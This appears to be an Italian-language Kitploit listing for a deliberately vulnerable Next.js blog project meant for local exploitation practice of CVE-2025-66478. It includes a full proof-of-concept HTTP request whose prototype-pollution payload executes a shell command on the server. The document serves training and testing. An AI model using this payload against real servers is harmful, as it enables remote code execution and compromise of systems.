Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2025-66478_rce_vulnerable — IMPORTANTE: Progetto Next JS VULNERABILE creato solo a scopo educativo, di test e di exploit, NON SE NE RACCOMANDA L'INSTALLAZIONE IN PRODUZIONE, SOLO IN AMBITO LOCALE O IN AMBIENTE CONTROLLATO | Kitploit
Strumenti/GitHubGitHub/letalandroid/cve-2025-66478_rce_vulnerable
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubletalandroid/cve-2025-66478_rce_vulnerable

cve-2025-66478_rce_vulnerable

IMPORTANTE: Progetto Next JS VULNERABILE creato solo a scopo educativo, di test e di exploit, NON SE NE RACCOMANDA L'INSTALLAZIONE IN PRODUZIONE, SOLO IN AMBITO LOCALE O IN AMBIENTE CONTROLLATO

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi RepositorySito web
1 mese faNon ancora revisionato

Blog moderno con shadcn/ui

Un blog moderno ed elegante costruito con Next.js 16, React 19, shadcn/ui e Tailwind CSS.

IMPORTANTE:

Progetto Next JS VULNERABILE creato solo per scopi educativi, di test e di exploitation, NON SE NE RACCOMANDA L'INSTALLAZIONE IN PRODUZIONE, SOLO IN AMBITO LOCALE O IN AMBIENTE CONTROLLATO

PoC

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Riferimento: github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478

Caratteristiche

  • 🎨 Design Moderno: Interfaccia elegante costruita con shadcn/ui
  • 📝 Blog Completo: Molteplici articoli del blog con contenuto mock
  • 💬 Sistema di Reazioni: Reagisci ai post con diverse emozioni (like, love, laugh, wow, sad, angry)
  • 👤 Autenticazione: Sistema di registrazione e accesso tramite localStorage
  • 🎯 Responsive: Design completamente responsive
  • 🌙 Modalità Scura: Supporto per la modalità scura automatica

Tecnologie

  • Next.js 16 - Framework React
  • React 19 - Libreria UI
  • shadcn/ui - Componenti UI moderni
  • Tailwind CSS 4 - Stili utilitari
  • TypeScript - Tipizzazione statica
  • Lucide React - Icone
  • Radix UI - Componenti accessibili

Installazione

  1. Installa le dipendenze:
root@kitploit:~
npm install
# o
yarn install
# o
pnpm install
  1. Esegui il server di sviluppo:
root@kitploit:~
npm run dev
# o
yarn dev
# o
pnpm dev
  1. Apri http://localhost:3000 nel tuo browser.

Struttura del Progetto

root@kitploit:~
├── app/                    # Pagine di Next.js
│   ├── blog/[id]/         # Pagina di dettaglio del blog
│   ├── profile/            # Pagina del profilo
│   ├── layout.tsx          # Layout principale
│   └── page.tsx            # Pagina principale
├── components/             # Componenti React
│   ├── auth/              # Componenti di autenticazione
│   ├── blog/              # Componenti del blog
│   ├── layout/             # Componenti di layout
│   └── ui/                 # Componenti shadcn/ui
├── lib/                    # Utility e servizi
│   ├── auth.ts            # Servizio di autenticazione
│   ├── mocks.ts           # Dati mock
│   └── utils.ts           # Utility generali
└── public/                 # File statici

Funzionalità

Autenticazione

  • Registrazione di nuovi utenti
  • Accesso
  • Archiviazione in localStorage
  • Profilo utente

Blog

  • Elenco di articoli nella pagina principale
  • Pagina di dettaglio per ogni articolo
  • Informazioni sull'autore
  • Categorie e tag
  • Immagini di copertina

Reazioni

  • Visualizzare tutte le reazioni di un post
  • Reagire con diverse emozioni
  • Contatore delle reazioni per tipo
  • Elenco degli utenti che hanno reagito

Dati Mock

Tutti i dati (blog, utenti, reazioni) sono completamente mock e vengono generati dinamicamente. Non è richiesto un database.

Note

  • Le credenziali utente vengono archiviate in localStorage
  • I dati vengono rigenerati a ogni ricaricamento della pagina
  • Il sistema di reazioni è solo visivo (non salva le nuove reazioni)

Licenza

Questo progetto è solo a scopo educativo.

Scarica lo strumento